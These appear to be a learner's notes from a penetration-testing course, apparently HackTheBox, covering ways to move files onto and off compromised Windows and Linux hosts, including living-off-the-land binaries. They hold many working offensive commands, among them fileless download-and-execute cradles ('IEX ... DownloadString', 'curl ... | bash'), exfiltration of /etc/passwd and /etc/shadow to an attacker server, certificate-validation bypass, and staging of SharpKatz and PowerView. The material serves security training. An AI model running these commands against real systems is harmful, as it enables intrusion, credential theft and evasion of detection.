Notes on Windows File Transfer Methods.

Introduction

• Understanding Windows file transfer methods aids attackers in evading detection and defenders in monitoring and securing systems.
• Example: Microsoft Astaroth Attack, an advanced persistent threat (APT) using fileless techniques.
  • Steps:
    1. Spear-phishing email with URL to an archive containing an LNK file.
    2. LNK file triggers WMIC with “/Format” to download and execute malicious JavaScript.
    3. JavaScript uses Bitsadmin to download base64-encoded payloads.
    4. Certutil decodes payloads into DLLs; regsvr32 loads a DLL, injecting the final payload into the Userok process.
  • Fileless Threats: Run in memory to avoid detection, not stored as traditional files.

File Transfer Methods

PowerShell Base64 Encode & Decode

• Purpose: Transfer files without network communication by encoding to base64.
• Process:
  • Encode on source (e.g., Linux):

    cat id_rsa | base64 -w 0

  • Decode on Windows:

    [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64_string>"))

  • Verify integrity with MD5:
    • Linux: md5sum id_rsa
    • Windows: Get-FileHash -Path C:\Users\Public\id_rsa -Algorithm MD5
• Limitations:
  • CMD string limit: 8,191 characters.
  • Web shells may fail with large strings.

PowerShell Web Downloads

• Context: HTTP/HTTPS often allowed, enabling web-based transfers.
• Methods:
  • System.Net.WebClient:
    • DownloadFile:

      (New-Object Net.WebClient).DownloadFile('https://<URL>', '<OutputPath>')

    • DownloadString (fileless):

      IEX (New-Object Net.WebClient).DownloadString('https://<URL>')

  • Invoke-WebRequest (PowerShell 3.0+):
    • Slower, supports aliases (iwr, wget).
    • Example:

      Invoke-WebRequest https://<URL> -OutFile <OutputPath>

• Errors:
  • IE Configuration: Bypass with -UseBasicParsing.

    Invoke-WebRequest https://<URL> -UseBasicParsing | IEX

  • SSL/TLS: Bypass certificate validation.

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

• Resources: Harmjoy’s PowerShell download cradles for nuanced options.

SMB Downloads

• Protocol: SMB on TCP/445, common in Windows networks.
• Setup:
  • Create SMB server (Pwnbox):

    sudo impacket-smbserver share -smb2support /tmp/smbshare

  • Copy file:

    copy \\<IP>\share\nc.exe

• Authentication:
  • Newer Windows blocks guest access.
  • Use credentials:

    sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

    net use n: \\<IP>\share /user:test test
    copy n:\nc.exe

FTP Downloads

• Protocol: FTP on TCP/20, TCP/21.
• Setup:
  • Install/run FTP server:

    sudo pip3 install pyftpdlib
    sudo python3 -m pyftpdlib --port 21

  • Download with PowerShell:

    (New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\file.txt')

  • Non-interactive FTP:
    • Create ftpcommand.txt:

      echo open <IP> > ftpcommand.txt
      echo USER anonymous >> ftpcommand.txt
      echo binary >> ftpcommand.txt
      echo GET file.txt >> ftpcommand.txt
      echo bye >> ftpcommand.txt

    • Execute:

      ftp -v -n -s:ftpcommand.txt

Upload Operations

• Purpose: Exfiltrate files for analysis or cracking.
• Methods:
  • PowerShell Base64 Encode:
    • Encode on Windows:

      [Convert]::ToBase64String((Get-Content -Path "C:\Windows\system32\drivers\etc\hosts" -Raw -Encoding Byte))

    • Decode on Linux:

      echo <base64_string> | base64 -d > hosts
      md5sum hosts

  • PowerShell Web Uploads:
    • Use uploadserver:

      pip3 install uploadserver
      python3 -m uploadserver

    • Upload:

      Invoke-FileUpload -Uri http://<IP>:8000/upload -File C:\Windows\System32\drivers\etc\hosts

    • Base64 with Netcat:

      $b64 = [Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Raw -Encoding Byte))
      Invoke-WebRequest -Uri http://<IP>:8000/ -Method POST -Body $b64

      nc -lvnp 8000
      echo <base64_string> | base64 -d > hosts

  • FTP Upload:
    • PowerShell:

      (New-Object Net.WebClient).UploadFile('ftp://<IP>/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

    • Non-interactive:

      echo open <IP> > ftpcommand.txt
      echo USER anonymous >> ftpcommand.txt
      echo binary >> ftpcommand.txt
      echo PUT C:\Windows\System32\drivers\etc\hosts >> ftpcommand.txt
      echo bye >> ftpcommand.txt
      ftp -v -n -s:ftpcommand.txt

  • SMB Uploads:
    • SMB over HTTP (WebDav):
      • Install WebDav:

        sudo pip3 install wsgidav cheroot
        sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

      • Connect/upload:

        dir \\<IP>\DavWWWRoot
        copy C:\file.txt \\<IP>\DavWWWRoot

    • Note: Outbound SMB (TCP/445) often blocked, making WebDav a workaround.

Notes on Linux File Transfer Methods

Introduction

• Linux offers versatile tools for file transfers, benefiting both attackers (evading detection) and defenders (securing systems).
• Example: Incident response on web servers revealed threat actors exploiting SQL injection to deploy a Bash script. The script attempted malware downloads via:
  1. cURL
  2. wget
  3. Python (all using HTTP).
• Common Protocols: Malware often uses HTTP/HTTPS; Linux also supports FTP and SMB, but HTTP/HTTPS dominates.

Download Operations

• Scenario: Transfer files from Pwnbox to a compromised Linux machine (NX04).

Base64 Encoding/Decoding

• Purpose: Transfer files without network communication by encoding to base64.
• Process:
  • Check file integrity (Pwnbox):

    md5sum id_rsa
    # Output: 4e301756a07ded0a2dd6953abf015278 id_rsa

  • Encode to base64:

    cat id_rsa | base64 -w 0; echo
    # Output: LS0tLS1CRUdJTtBPUEVOU1NIIFBSSVZBVEUgS0VZLS0t...

  • Decode on target:

    echo -n '<base64_string>' | base64 -d > id_rsa

  • Verify integrity:

    md5sum id_rsa
    # Output: 4e301756a07ded0a2dd6953abf015278 id_rsa

• Note: Reverse operation (encode on target, decode on Pwnbox) supports uploads.

Web Downloads with wget and cURL

• Tools: wget and cURL, common in Linux distributions.
• Commands:
  • wget:

    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

  • cURL:

    curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

• Difference: wget uses -O (uppercase); cURL uses -o (lowercase) for output filename.

Fileless Attacks

• Concept: Execute scripts without saving to disk using pipes.
• Examples:
  • cURL:

    curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

  • wget (Python script):

    wget -qO- https://raw.githubusercontent.com/guliourena/plaintext/master/hello.py | python
    # Output: hello World!

• Note: Some payloads (e.g., mhillo) may create temporary files despite fileless execution.

Download with Bash (/dev/tcp)

• Use Case: When wget or cURL are unavailable, use Bash (version 2.04+ with --enable-net-redirections).
• Process:
  • Connect to web server:

    exec 3<>/dev/tcp/10.10.10.32/80

  • Send HTTP GET request:

    echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3

  • Read response:

    cat <&3

SSH Downloads

• Protocol: SCP (secure copy) over SSH for secure file transfers.
• Setup Pwnbox SSH Server:
  • Enable:

    sudo systemctl enable ssh

  • Start:

    sudo systemctl start ssh

  • Verify:

    netstat -lnpt
    # Output: TCP 0.0.0.0:22 LISTEN

• Download with SCP:

  scp plaintext@192.168.49.128:/root/myroot.txt .

• Note: Use temporary accounts to avoid exposing primary credentials.

Upload Operations

• Purpose: Exfiltrate files (e.g., for binary exploitation or packet analysis).
• Methods: Reuse download techniques for uploads.

Web Upload

• Tool: uploadserver (Python module) with HTTPS support.
• Setup:
  • Install:

    sudo python3 -m pip install --user uploadserver

  • Create self-signed certificate:

    openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048

  • Start server:

    mkdir https && cd https
    sudo python3 -m uploadserver 443 --server-certificate /server.pem

• Upload from target:

  curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

• Note: --insecure used for self-signed certificate.

Alternative Web File Transfer

• Concept: Use Python, PHP, or Ruby to host a web server on the target for file access.
• Commands:
  • Python3:

    python3 -m http.server
    # Serves on 0.0.0.0:8000

  • Python2.7:

    python2.7 -m SimpleHTTPServer

  • PHP:

    php -S 0.0.0.0:8000

  • Ruby:

    ruby -run -ehttpd . -p8000

• Download from Pwnbox:

  wget 192.168.49.128:8000/filetotransfer.txt

• Note: Inbound traffic may be blocked; this method downloads from target to Pwnbox, not uploads.

SCP Upload

• Use Case: SSH (TCP/22) allowed for outbound connections.
• Command:

  scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/

• Note: SCP syntax mirrors cp; requires SSH server on destination.

Notes on Transferring Files with Code

Introduction

• Common programming languages (Python, PHP, Perl, Ruby, JavaScript, VBScript) are often available on Linux and sometimes Windows, enabling file transfer operations.
• Windows supports JavaScript/VBScript via cscript.exe or wscript.exe.
• Approximately 700 programming languages exist, offering flexibility for file transfers and OS interactions.

Download Operations

Python

• Versions: Python 3 (current), Python 2.7 (legacy, still found on some servers).
• Method: Use -c for one-liners.
• Examples:
  • Python 2.7:

    python2.7 -c 'import urllib; urllib.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

  • Python 3:

    python3 -c 'import urllib.request; urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PHP

• Prevalence: Used by ~77.4% of websites with known server-side languages (W3Techs).
• Methods:
  • file_get_contents and file_put_contents:

    php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh", $file);'

  • fopen:

    php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while($buffer = fread($fremote, BUFFER)) fwrite($flocal, $buffer); fclose($fremote); fclose($flocal);'

  • Fileless (pipe to Bash):

    php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); echo implode("", $lines);' | bash

• Note: @file treats URLs as filenames if fopen wrappers are enabled.

Ruby

• Method: Use -e for one-liners.
• Example:

  ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

• Method: Use -e for one-liners.
• Example:

  perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

JavaScript (Windows)

• Method: Use cscript.exe to run JavaScript for downloads.
• Code (wget.js):

  var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  WinHttpReq.Open("GET", WScript.Arguments(0), /*async*/false);
  WinHttpReq.Send();
  BinStream = new ActiveXObject("ADODB.Stream");
  BinStream.Type = 1;
  BinStream.Open();
  BinStream.Write(WinHttpReq.ResponseBody);
  BinStream.SaveToFile(WScript.Arguments(1));

• Execution:

  cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 PowerView.ps1

VBScript (Windows)

• Context: Default in Windows since Windows 98.
• Code (wget.vbs):

  dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
  dim bStrm: Set bStrm = createobject("Adodb.Stream")
  xHttp.Open "GET", WScript.Arguments.Item(0), False
  xHttp.Send
  with bStrm
      .type = 1
      .open
      .write xHttp.responseBody
      .savetofile WScript.Arguments.Item(1), 2
  end with

• Execution:

  cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 PowerView.ps1

Upload Operations

Python 3

• Tool: requests module for HTTP POST requests.
• Setup: Start uploadserver on Pwnbox:

  python3 -m uploadserver
  # Serves on 0.0.0.0:8000

• One-liner:

  python3 -c 'import requests; requests.post("http://192.168.49.128:8000/upload", files={"files": open("/etc/passwd", "rb")})'

• Expanded Code:

  import requests
  URL = "http://192.168.49.128:8000/upload"
  file = open("/etc/passwd", "rb")
  r = requests.post(URL, files={"files": file})

• Note: Adaptable to other languages by building similar upload logic.

Notes on Miscellaneous File Transfer Methods

Introduction

• Extends previous Windows/Linux file transfer methods and programming language approaches with additional techniques using Netcat, Ncat, PowerShell Remoting, and RDP.

Netcat and Ncat

Overview

• Netcat (nc): Networking utility (1995, Hobbit) for TCP/UDP connections, unmaintained but widely used.
• Ncat: Modern Nmap Project reimplementation with SSL, IPv6, SOCKS/HTTP proxies, and connection brokering.
• Note: On HackTheBox Pwnbox, nc, ncat, and netcat all refer to Ncat.

File Transfer with Netcat/Ncat

• Scenario: Transfer SharpKatz.exe from Pwnbox to a compromised machine.
• Method 1: Compromised Machine Listens
  • Compromised Machine (listen):
    • Netcat:

      nc -l -p 8000 > SharpKatz.exe

    • Ncat:

      ncat -l -p 8000 --recv-only > SharpKatz.exe

  • Pwnbox (send):
    • Netcat:

      nc -q 0 192.168.49.128 8000 < SharpKatz.exe

    • Ncat:

      ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

  • Notes:
    • -q 0: Closes connection after transfer (Netcat).
    • --recv-only/--send-only: Ensures connection closes post-transfer (Ncat).
• Method 2: Pwnbox Listens (Bypasses Inbound Firewall)
  • Pwnbox (listen):
    • Netcat:

      sudo nc -l -p 443 -q 0 < SharpKatz.exe

    • Ncat:

      sudo ncat -l -p 443 --send-only < SharpKatz.exe

  • Compromised Machine (connect):
    • Netcat:

      nc 192.168.49.128 443 > SharpKatz.exe

    • Ncat:

      ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

• Method 3: Bash /dev/tcp (No Netcat/Ncat on Compromised Machine)
  • Pwnbox (listen):
    • Netcat:

      sudo nc -l -p 443 -q 0 < SharpKatz.exe

    • Ncat:

      sudo ncat -l -p 443 --send-only < SharpKatz.exe

  • Compromised Machine (connect):

    cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

• Note: Reverse operation transfers files from compromised machine to Pwnbox.

PowerShell Remoting (WinRM)

• Context: Used when HTTP/HTTPS/SMB are unavailable; leverages PowerShell Remoting (WinRM) for remote command execution and file transfers.
• Requirements: Administrative access, Remote Management Users group membership, or explicit permissions; enabled by default with HTTP (TCP/5985) and HTTPS (TCP/5986) listeners.
• Scenario: Transfer files between DC01 (source) and DATABASE01 (target) with administrative privileges.
• Steps:
  • Verify WinRM connectivity (from DC01):

    whoami
    # Output: htb\administrator
    hostname
    # Output: DC01
    Test-NetConnection -ComputerName DATABASE01 -Port 5985
    # Output: TcpTestSucceeded: True

  • Create session:

    $Session = New-PSSession -ComputerName DATABASE01

  • Transfer files:
    • DC01 to DATABASE01:

      Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop

    • DATABASE01 to DC01:

      Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -FromSession $Session -Destination C:\htb

RDP (Remote Desktop Protocol)

• Context: Common in Windows for remote access; supports file transfers via copy-paste or drive mounting.
• Methods:
  • Copy-Paste:
    • Right-click to copy files from target Windows machine and paste into RDP session.
    • Linux clients (xfreerdp, rdesktop) support copy from target to session, but functionality may be inconsistent.
  • Drive Mounting:
    • Linux (mount local folder):
      • rdesktop:

        rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password00' -r disk:linux=/home/user

      • xfreerdp:

        xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password00' /drive:linux,/home/user

      • Access via \\tsclient\linux in RDP session.
    • Windows (native mstsc.exe):
      • Enable drive in Remote Desktop Connection settings (Local Resources > More > Drives).
      • Interact with drive in remote session.
    • Note: Mounted drive is exclusive to the RDP session user, preventing access by others, even if session is hijacked.

Practical Applications

• Use Cases:
  • Active Directory Enumeration and Attacks (Skills Assessments 1 & 2).
  • Pivoting, Tunneling & Port Forwarding module.
  • Attacking Enterprise Networks module.
  • Shells & Payloads module.
• Recommendation: Practice all techniques to build “muscle memory” for varied environments with restrictions (e.g., blocked protocols).

Notes on Living off the Land

Introduction

• Living off the Land (LotL): Coined by Christopher Campbell and Matt Graeber at DerbyCon 3, refers to using native system binaries for malicious purposes.
• LOLBins: Living off the Land Binaries, repurposed for unintended functions (term from Twitter discussions).
• Resources:
  • LOLBAS: Windows binaries (lolbas-project.github.io).
  • GTFOBins: Linux binaries (gtfobins.github.io).
• Functions: Download, upload, command execution, file read/write, and bypasses.
• Focus: Download/upload using LOLBAS and GTFOBins.

Using LOLBAS and GTFOBins

LOLBAS (Windows)

• Search: Use /download or /upload on lolbas-project.github.io.
• Examples:
  • CertReq.exe (Download):
  • ConfigSecurityPolicy.exe (Upload)
  • DataSvcUtil.exe (Upload)
• Example: CertReq.exe Upload:
  • Pwnbox (listen):

    sudo nc -lvnp 8000

  • Compromised Machine:

    certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

  • Output: File content (e.g., win.ini) received in Netcat session.
  • Note: Older certreq.exe versions may lack -Post; download updated version if needed.

GTFOBins (Linux)

• Search: Use +file download or +file upload on gtfobins.github.io.
• Examples:
  • Binaries: ab, bash, curl, scp, socat, ssh, wget.
  • Functions: File download/upload, SUID, sudo.
• Example: OpenSSL Download:
  • Pwnbox (create certificate and start server):

    openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
    openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem

  • Compromised Machine (download):

    openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Other Common LotL Tools

Bitsadmin (Windows)

• Purpose: Background Intelligent Transfer Service (BITS) downloads files from HTTP/SMB, minimizing impact on user tasks.
• Example:

  bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\htb\nc.exe

• PowerShell BITS:

  Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\htb\nc.exe"

• Features: Supports credentials, proxy servers, uploads.

Certutil (Windows)

• Purpose: Downloads arbitrary files, widely available but detected by Antimalware Scan Interface (AMSI) as malicious.
• Example:

  certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe

Practice Recommendations

• Explore LOLBAS/GTFOBins for obscure binaries to build versatile file transfer skills.
• Useful for assessments where common methods are restricted.
• Document techniques for quick reference during engagements.